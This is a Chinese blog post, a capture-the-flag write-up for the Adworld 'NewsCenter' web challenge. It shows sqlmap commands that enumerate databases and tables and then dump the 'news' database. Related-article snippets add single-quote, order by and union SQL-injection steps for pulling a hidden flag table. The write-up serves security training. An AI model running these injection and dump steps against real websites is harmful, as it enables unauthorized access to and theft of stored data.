攻防世界web高阶2分题(NewsCenter)

最新推荐文章于 2024-05-18 20:54:16 发布
最新推荐文章于 2024-05-18 20:54:16 发布
阅读量192 收藏
点赞数
分类专栏: 网安
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45791542/article/details/107734376
版权

读题

在这里插入图片描述
发现是一个搜索框,觉得是个sql注入
随便输入什么,我这里输入aaa,然后抓包
PS:一定要抓搜索后的包

  • 然后将抓到的包保存在桌面1.txt
    在这里插入图片描述
    在这里插入图片描述

  • 然后用sqlmap注入
    1、查找数据库
    python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --dbs

在这里插入图片描述
2、查找news下的表
python sqlmap.py -r D:\360data\重要数据\桌面\1.txt --tables -D news
在这里插入图片描述3、建立可后台news库连接, 搜索所有的数据

python sqlmap.py -r D:\360data\重要数据\桌面\1.txt -D news --dump

在这里插入图片描述
PS:1.txt的路径一定要写具体路径

Phoenix-Pl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界----NewsCenter(字符型SQL注入,union联合查询)
m0_70182904的博客
05-22 1814
在使用union之前需要明确:union前面查询语句查询的元素与后面查询语句查询的元素要数量上要一样,这一点可以使用order by实现(原理:order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数,但是不能多于查询的属性数)搜索框输入hello,出现与之相关的新闻内容,输入hello'之后发现网页报错,提示我们可能存在字符型SQL注入,再次输入单引号 ',发现网页再次报错,输入hello'#没有报错提示。得到表名news、secret_table。
攻防世界-web-newscenter
wuh2333的博客
05-30 1079
攻防世界,sql注入
攻防世界-NewsCenter
weixin_39579781的博客
05-06 1183
目打开是有个输入框可以用来输入搜索信息,初步判断是个sql注入的目。接下来判断能否进行sql注入:输入 hi,有搜索结果,如下图:输入hi’,无结果,如下图:初步判定是hi‘后面还有单引号,导致重复输入导致的,(单引号与服务端代码中的’形成闭合,将我们输入的字符串hello包裹,服务端代码后面多出来一个‘导致语法错误,而加入#将后面的’注释掉之后不会报错,可确定为字符型SQL注入。
攻防世界NewsCenter
金 帛的博客
04-09 2378
攻防世界WP
攻防世界---web---NewsCenter
最新发布
2201_75556700的博客
05-18 378
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
攻防世界手进区)——NewsCenter
知足且坚定,温柔且上进
02-11 2139
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。 用burpsuite抓包,: 尝试xff,无果,直接sql注入,利用sqlmap. 将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置) sqlmap.py -r flag.txt --dbs 发现两个包,分别尝试,只有news有: sqlm...
newscenter_app
02-20
使用异步Web抓取脚本,每3小时更新一次新闻报道。特征从顶级主流媒体网站的首页显示15个热门新闻头条。 单击每个标将使用户链接到实际文章。未来的改进添加其他新闻站点以进行更多样化的比较添加下拉菜单,允许...
NewsCenter
06-23
ASP(Active Server Pages)是微软开发的一种服务器端脚本环境,用于创建动态网页或Web应用程序。在ASP中,开发者可以使用VBScript或JScript编写脚本,服务器端执行这些脚本并返回HTML到客户端浏览器。在【新闻中心...
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python模块、库和其他可重用代码。"newscenter-2.0.4.tar.gz"这个压缩包正是PyPI上一个...
XCTF 攻防世界 Web的基本知识点
weixin_43456810的博客
11-28 2155
XCTF 攻防世界 Web的基本知识点和解思路 大多数情况下,robots协议指的就是robots.txt index.php的备份文件:/index.php.bak 页面中如果出现了不能按的按钮,可能是代码中设置了disable参数,将网页源代码中的disable=""删除或者改为false(注意:safari浏览器可能无法方便的直接修改源代码,可以换为firefox浏览器) 遇到php的源代码,注重分析,如果只是简短的几行代码,并且有类似于$a, $b这样的变量,可以直接在url的后面添加上 /?
XCTF攻防世界web练习_ 1_NewsCenter
silence1_的博客
04-30 3039
XCTF攻防世界web练习—NewsCenter 目是NewsCenter,没有提示信息。 打开目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。 随便输入123,用burp抓包,发现是post方式,因为sql注入技术太菜,直接用sqlmap爆破。 将http头保存为1.txt,试试用sqlmap爆数据库 ...
攻防世界 Misc手进区 2分 easycap
闵行小鱼塘
10-24 488
继续ctf的旅程,攻防世界Misc手进区的2分,本篇是easycap的writeup
攻防世界-WEB篇(二)
weixin_42271850的博客
07-05 272
简述 好久没有更新这个XCTF的目了,现在过来更新一下。争取今年能够入门CTF的WEB方向。 一、PHP2 从目就能看到提示,应该是和Robots.txt文件相关的。直接在URL后面输入/robots.txt。 可以看到提升我们网站中有fl0g.php这个文件。我们直接访问就能得到flag。 二、baby_web 目描述想想初始页面是哪个,再结合点击的链接为http:/...
攻防世界webweb2详解
hxhxhxhxx的博客
07-31 2583
攻防世界webweb2详解目解法strrev函数substrordchr()str_rot13() 目 解法 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){
攻防世界web第二
m0_55754984的博客
06-21 140
关于robots协议: robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛),此网站中的哪些内容是不应被搜索引擎的漫游器获取的,哪些是可以被漫游器获取的。因为一些系统中的URL是大小写敏感的,所以robots.txt的文件名应统一为小写。robots.txt应放置于网站的根目录下。如果想单独定义搜索引擎的漫游器访问子目录时的行为,那么可以将自定的设置合并到根目录下的robots.txt,或者使用robots元
攻防世界-web2-(详细操作)做过程
qq_43715020的博客
06-16 1120
攻防世界-web2-(详细操作)做过程
攻防世界 WEB NewsCenter
diepangan3893的博客
09-23 486
  前几天才发现攻防世界这个平台,真是相见恨晚,正愁没地方检验自己大学四年学安全的学习成果,于是沉浸于寻找flag,大概一天一到两的进度(解完两就学别的去了,尽管如此也挺慢的了)在解的同时也总结了安全的方方面面,各种工具和用法、各种漏洞的判断和利用.....最近终于磕磕绊绊做完了web的新手练习,怀着兴奋又紧张的心情进了手进,扑面而来就是两页,选了1分里名字最直白的一个——N...
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值